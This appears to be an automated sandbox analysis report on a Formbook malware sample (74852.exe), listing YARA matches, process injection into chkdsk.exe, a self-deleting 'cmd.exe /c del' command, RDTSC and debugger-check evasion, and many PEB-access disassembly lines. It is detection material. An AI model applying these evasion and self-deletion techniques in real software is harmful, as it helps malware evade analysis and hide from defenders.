          Source: 00000001.00000002.286361146.0000000001330000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.286361146.0000000001330000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.74852.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.74852.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.74852.exe.2fa0000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.74852.exe.2fa0000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.74852.exe.2fa0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.74852.exe.2fa0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.74852.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.74852.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/0@10/3
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6296:120:WilError_01
          Source: 74852.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\74852.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: 74852.exeReversingLabs: Detection: 43%
          Source: C:\Users\user\Desktop\74852.exeFile read: C:\Users\user\Desktop\74852.exe
          Source: unknownProcess created: C:\Users\user\Desktop\74852.exe 'C:\Users\user\Desktop\74852.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\74852.exe 'C:\Users\user\Desktop\74852.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\74852.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\74852.exeProcess created: C:\Users\user\Desktop\74852.exe 'C:\Users\user\Desktop\74852.exe'
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\74852.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
          Source: 74852.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: 74852.exe, 00000000.00000003.239671965.000000001C660000.00000004.00000001.sdmp, 74852.exe, 00000001.00000002.287145563.000000000150F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 74852.exe
          Source: 74852.exeStatic PE information: real checksum: 0x192ce should be: 0x3b2c0
          Source: C:\Users\user\Desktop\74852.exeCode function: 0_2_00237C90 push eax; ret 0_2_00237CBE
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_00237C90 push eax; ret 1_2_00237CBE
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0041D0D2 push eax; ret 1_2_0041D0D8
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0041D0DB push eax; ret 1_2_0041D142
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0041D085 push eax; ret 1_2_0041D0D8
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_00408138 push edi; retf 1_2_0040813F
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0041D13C push eax; ret 1_2_0041D142
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0041D22A push BBECAF91h; ret 1_2_0041D277
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_00416A3E push cs; retf 1_2_00416A52
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_00416AD6 push eax; iretd 1_2_00416AD7
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_00416AB0 pushad ; retf 1_2_00416AB4
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_00417B60 push cs; iretd 1_2_00417B62
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_00403658 push FFFFFFA6h; iretd 1_2_0040365A
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_00416674 push edx; retf 1_2_00416689
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0041E6A3 push esi; retf 1_2_0041E6A5
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0041DF21 push es; ret 1_2_0041DF22
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_004167A7 push edi; ret 1_2_004167A8
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0146D0D1 push ecx; ret 1_2_0146D0E4
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\74852.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\74852.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 00000000010098E4 second address: 00000000010098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 0000000001009B5E second address: 0000000001009B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_00409A90 rdtsc 1_2_00409A90
          Source: C:\Windows\explorer.exe TID: 6880Thread sleep count: 55 > 30
          Source: C:\Windows\explorer.exe TID: 6880Thread sleep time: -110000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\chkdsk.exeLast function: Thread delayed
          Source: explorer.exe, 00000002.00000000.268007114.0000000008A32000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000002.00000000.268007114.0000000008A32000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000002.00000000.270582672.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.259692429.00000000059C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000002.00000000.270582672.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}osoft S##
          Source: explorer.exe, 00000002.00000000.270582672.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
          Source: explorer.exe, 00000002.00000000.255880997.00000000048E0000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.270582672.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
          Source: explorer.exe, 00000002.00000000.268504207.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
          Source: explorer.exe, 00000002.00000000.268504207.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000002.00000000.261751329.00000000069DA000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD002
          Source: explorer.exe, 00000002.00000000.259692429.00000000059C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000002.00000000.259692429.00000000059C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000002.00000000.259692429.00000000059C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\74852.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\74852.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_00409A90 rdtsc 1_2_00409A90
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0040ACD0 LdrLoadDll,1_2_0040ACD0
          Source: C:\Users\user\Desktop\74852.exeCode function: 0_2_00237790 mov eax, dword ptr fs:[00000030h]0_2_00237790
          Source: C:\Users\user\Desktop\74852.exeCode function: 0_2_0115F016 mov eax, dword ptr fs:[00000030h]0_2_0115F016
          Source: C:\Users\user\Desktop\74852.exeCode function: 0_2_0115F885 mov eax, dword ptr fs:[00000030h]0_2_0115F885
          Source: C:\Users\user\Desktop\74852.exeCode function: 0_2_0115F925 mov eax, dword ptr fs:[00000030h]0_2_0115F925
          Source: C:\Users\user\Desktop\74852.exeCode function: 0_2_0115F8C2 mov eax, dword ptr fs:[00000030h]0_2_0115F8C2
          Source: C:\Users\user\Desktop\74852.exeCode function: 0_2_0115FA6D mov eax, dword ptr fs:[00000030h]0_2_0115FA6D
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_00237790 mov eax, dword ptr fs:[00000030h]1_2_00237790
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01453D43 mov eax, dword ptr fs:[00000030h]1_2_01453D43
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0143B944 mov eax, dword ptr fs:[00000030h]1_2_0143B944
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0143B944 mov eax, dword ptr fs:[00000030h]1_2_0143B944
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01493540 mov eax, dword ptr fs:[00000030h]1_2_01493540
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01437D50 mov eax, dword ptr fs:[00000030h]1_2_01437D50
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0141C962 mov eax, dword ptr fs:[00000030h]1_2_0141C962
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0141B171 mov eax, dword ptr fs:[00000030h]1_2_0141B171
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0141B171 mov eax, dword ptr fs:[00000030h]1_2_0141B171
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0143C577 mov eax, dword ptr fs:[00000030h]1_2_0143C577
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0143C577 mov eax, dword ptr fs:[00000030h]1_2_0143C577
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01419100 mov eax, dword ptr fs:[00000030h]1_2_01419100
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01419100 mov eax, dword ptr fs:[00000030h]1_2_01419100
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01419100 mov eax, dword ptr fs:[00000030h]1_2_01419100
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01434120 mov eax, dword ptr fs:[00000030h]1_2_01434120
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01434120 mov eax, dword ptr fs:[00000030h]1_2_01434120
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01434120 mov eax, dword ptr fs:[00000030h]1_2_01434120
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01434120 mov eax, dword ptr fs:[00000030h]1_2_01434120
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01434120 mov ecx, dword ptr fs:[00000030h]1_2_01434120
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0141AD30 mov eax, dword ptr fs:[00000030h]1_2_0141AD30
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014DE539 mov eax, dword ptr fs:[00000030h]1_2_014DE539
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01423D34 mov eax, dword ptr fs:[00000030h]1_2_01423D34
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01423D34 mov eax, dword ptr fs:[00000030h]1_2_01423D34
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01423D34 mov eax, dword ptr fs:[00000030h]1_2_01423D34
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01423D34 mov eax, dword ptr fs:[00000030h]1_2_01423D34
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01423D34 mov eax, dword ptr fs:[00000030h]1_2_01423D34
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01423D34 mov eax, dword ptr fs:[00000030h]1_2_01423D34
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01423D34 mov eax, dword ptr fs:[00000030h]1_2_01423D34
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01423D34 mov eax, dword ptr fs:[00000030h]1_2_01423D34
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01423D34 mov eax, dword ptr fs:[00000030h]1_2_01423D34
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01423D34 mov eax, dword ptr fs:[00000030h]1_2_01423D34
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01423D34 mov eax, dword ptr fs:[00000030h]1_2_01423D34
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01423D34 mov eax, dword ptr fs:[00000030h]1_2_01423D34
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01423D34 mov eax, dword ptr fs:[00000030h]1_2_01423D34
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E8D34 mov eax, dword ptr fs:[00000030h]1_2_014E8D34
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0144513A mov eax, dword ptr fs:[00000030h]1_2_0144513A
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0144513A mov eax, dword ptr fs:[00000030h]1_2_0144513A
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0149A537 mov eax, dword ptr fs:[00000030h]1_2_0149A537
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01444D3B mov eax, dword ptr fs:[00000030h]1_2_01444D3B
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01444D3B mov eax, dword ptr fs:[00000030h]1_2_01444D3B
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01444D3B mov eax, dword ptr fs:[00000030h]1_2_01444D3B
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01496DC9 mov eax, dword ptr fs:[00000030h]1_2_01496DC9
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01496DC9 mov eax, dword ptr fs:[00000030h]1_2_01496DC9
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01496DC9 mov eax, dword ptr fs:[00000030h]1_2_01496DC9
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01496DC9 mov ecx, dword ptr fs:[00000030h]1_2_01496DC9
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01496DC9 mov eax, dword ptr fs:[00000030h]1_2_01496DC9
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01496DC9 mov eax, dword ptr fs:[00000030h]1_2_01496DC9
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0141B1E1 mov eax, dword ptr fs:[00000030h]1_2_0141B1E1
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0141B1E1 mov eax, dword ptr fs:[00000030h]1_2_0141B1E1
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0141B1E1 mov eax, dword ptr fs:[00000030h]1_2_0141B1E1
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014A41E8 mov eax, dword ptr fs:[00000030h] | 1_2_014A41E8
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_0142D5E0 mov eax, dword ptr fs:[00000030h] | 1_2_0142D5E0
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_0142D5E0 mov eax, dword ptr fs:[00000030h] | 1_2_0142D5E0
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014DFDE2 mov eax, dword ptr fs:[00000030h] | 1_2_014DFDE2
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014DFDE2 mov eax, dword ptr fs:[00000030h] | 1_2_014DFDE2
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014DFDE2 mov eax, dword ptr fs:[00000030h] | 1_2_014DFDE2
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014DFDE2 mov eax, dword ptr fs:[00000030h] | 1_2_014DFDE2
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014C8DF1 mov eax, dword ptr fs:[00000030h] | 1_2_014C8DF1
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_0144A185 mov eax, dword ptr fs:[00000030h] | 1_2_0144A185
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_0143C182 mov eax, dword ptr fs:[00000030h] | 1_2_0143C182
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01442581 mov eax, dword ptr fs:[00000030h] | 1_2_01442581
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01442581 mov eax, dword ptr fs:[00000030h] | 1_2_01442581
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01442581 mov eax, dword ptr fs:[00000030h] | 1_2_01442581
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01442581 mov eax, dword ptr fs:[00000030h] | 1_2_01442581
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01412D8A mov eax, dword ptr fs:[00000030h] | 1_2_01412D8A
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01412D8A mov eax, dword ptr fs:[00000030h] | 1_2_01412D8A
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01412D8A mov eax, dword ptr fs:[00000030h] | 1_2_01412D8A
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01412D8A mov eax, dword ptr fs:[00000030h] | 1_2_01412D8A
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01412D8A mov eax, dword ptr fs:[00000030h] | 1_2_01412D8A
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01442990 mov eax, dword ptr fs:[00000030h] | 1_2_01442990
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_0144FD9B mov eax, dword ptr fs:[00000030h] | 1_2_0144FD9B
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_0144FD9B mov eax, dword ptr fs:[00000030h] | 1_2_0144FD9B
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014E05AC mov eax, dword ptr fs:[00000030h] | 1_2_014E05AC
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014E05AC mov eax, dword ptr fs:[00000030h] | 1_2_014E05AC
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014461A0 mov eax, dword ptr fs:[00000030h] | 1_2_014461A0
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014461A0 mov eax, dword ptr fs:[00000030h] | 1_2_014461A0
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014435A1 mov eax, dword ptr fs:[00000030h] | 1_2_014435A1
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014969A6 mov eax, dword ptr fs:[00000030h] | 1_2_014969A6
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01441DB5 mov eax, dword ptr fs:[00000030h] | 1_2_01441DB5
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01441DB5 mov eax, dword ptr fs:[00000030h] | 1_2_01441DB5
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01441DB5 mov eax, dword ptr fs:[00000030h] | 1_2_01441DB5
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014951BE mov eax, dword ptr fs:[00000030h] | 1_2_014951BE
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014951BE mov eax, dword ptr fs:[00000030h] | 1_2_014951BE
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014951BE mov eax, dword ptr fs:[00000030h] | 1_2_014951BE
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014951BE mov eax, dword ptr fs:[00000030h] | 1_2_014951BE
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_0144A44B mov eax, dword ptr fs:[00000030h] | 1_2_0144A44B
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01430050 mov eax, dword ptr fs:[00000030h] | 1_2_01430050
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01430050 mov eax, dword ptr fs:[00000030h] | 1_2_01430050
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014AC450 mov eax, dword ptr fs:[00000030h] | 1_2_014AC450
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014AC450 mov eax, dword ptr fs:[00000030h] | 1_2_014AC450
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_0143746D mov eax, dword ptr fs:[00000030h] | 1_2_0143746D
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014E1074 mov eax, dword ptr fs:[00000030h] | 1_2_014E1074
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014D2073 mov eax, dword ptr fs:[00000030h] | 1_2_014D2073
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014E740D mov eax, dword ptr fs:[00000030h] | 1_2_014E740D
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014E740D mov eax, dword ptr fs:[00000030h] | 1_2_014E740D
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014E740D mov eax, dword ptr fs:[00000030h] | 1_2_014E740D
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01496C0A mov eax, dword ptr fs:[00000030h] | 1_2_01496C0A
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01496C0A mov eax, dword ptr fs:[00000030h] | 1_2_01496C0A
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01496C0A mov eax, dword ptr fs:[00000030h] | 1_2_01496C0A
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01496C0A mov eax, dword ptr fs:[00000030h] | 1_2_01496C0A
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014D1C06 mov eax, dword ptr fs:[00000030h] | 1_2_014D1C06
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014D1C06 mov eax, dword ptr fs:[00000030h] | 1_2_014D1C06
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014D1C06 mov eax, dword ptr fs:[00000030h] | 1_2_014D1C06
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014D1C06 mov eax, dword ptr fs:[00000030h] | 1_2_014D1C06
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014D1C06 mov eax, dword ptr fs:[00000030h] | 1_2_014D1C06
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014D1C06 mov eax, dword ptr fs:[00000030h] | 1_2_014D1C06
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014D1C06 mov eax, dword ptr fs:[00000030h] | 1_2_014D1C06
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014D1C06 mov eax, dword ptr fs:[00000030h] | 1_2_014D1C06
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014D1C06 mov eax, dword ptr fs:[00000030h] | 1_2_014D1C06
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014D1C06 mov eax, dword ptr fs:[00000030h] | 1_2_014D1C06
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014D1C06 mov eax, dword ptr fs:[00000030h] | 1_2_014D1C06
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014D1C06 mov eax, dword ptr fs:[00000030h] | 1_2_014D1C06
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014D1C06 mov eax, dword ptr fs:[00000030h] | 1_2_014D1C06
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014D1C06 mov eax, dword ptr fs:[00000030h] | 1_2_014D1C06
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014E4015 mov eax, dword ptr fs:[00000030h] | 1_2_014E4015
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014E4015 mov eax, dword ptr fs:[00000030h] | 1_2_014E4015
